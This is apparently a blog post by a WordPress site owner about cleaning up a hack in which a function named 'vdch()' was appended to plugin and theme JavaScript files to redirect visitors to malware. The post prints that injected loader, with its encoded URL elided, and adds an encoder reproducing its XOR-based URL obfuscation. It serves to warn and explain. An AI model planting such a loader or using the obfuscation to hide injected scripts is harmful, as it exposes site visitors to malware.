I got an email today asking me for support. One of my WordPress setups had been reported to be hacked – resulting in a JavaScript redirect to a site distributing malware.
Searching for the hack itself or the redirect, I couldn’t find anything useful (except for an entry in the Google support forum).
Every JavaScript file in wp-content/plugins and wp-content/themes was infected with a function added to the bottom of the script: “function vdch()”. Make sure your blogs are clean.
Update: As I just read in this forum, on Stack Overflow and on WordPress.org, they seem to compromise PHP and HTML files too. I guess in my case they couldn’t by exploiting the WordPress vulnerability, because its built-in editor only allows you to edit plugins and themes.
This is the script they’ve been using on the setup I had to clean up. It fails in Firefox but seems to run fine in Chrome.
    function vdch() {
        // document.all is IE/Chrome-only; in Firefox this throws, which is why the script fails there
        if (document.all.length > 3) {
            // the array of "#rrggbb" strings (the obfuscated URL) is elided here
            var t = new Array(...);
            var dchid = "";
            for (j = 0; j < t.length; j++) {
                var c_rgb = t[j];
                // each token carries three characters in positions 1-2, 3-4 and 5-6;
                // the extra i++ inside substr() makes the XOR keys 2, 4 and 6
                for (i = 1; i < 7; i++) {
                    var c_clr = c_rgb.substr(i++, 2);
                    if (c_clr != "00") dchid += String.fromCharCode(parseInt(c_clr, 16) ^ i); // "00" is padding
                }
            }
            // inject a script tag whose src is the decoded URL
            var dch = document.createElement("script");
            dch.id = "dchid";
            dch.src = dchid;
            document.all[3].appendChild(dch);
        } else {
            setTimeout("vdch()", 500); // retry until the DOM has enough nodes
        }
    }
    setTimeout("vdch()", 500);
Update 2: I was curious about how the string (=URL) encryption works in the script above. Here’s the function I came up with. Pretty nice idea (never had a look at JavaScript obfuscation before).
    var url = "http://your.url/";
    var enc = new Array();
    var rgb = "#";
    for (var i = 0, j = 2; i < url.length; i++, j += 2) {
        rgb += (url.charCodeAt(i) ^ j).toString(16);       // XOR with 2, 4, 6 in turn
        if (j == 6) { j = 0; enc.push(rgb); rgb = "#"; }   // three characters per "#rrggbb" token
    }
    // a trailing group of fewer than three characters would otherwise be dropped:
    // pad it with "00" (which the decoder skips) and push it as well
    if (rgb != "#") {
        while (rgb.length < 7) rgb += "00";
        enc.push(rgb);
    }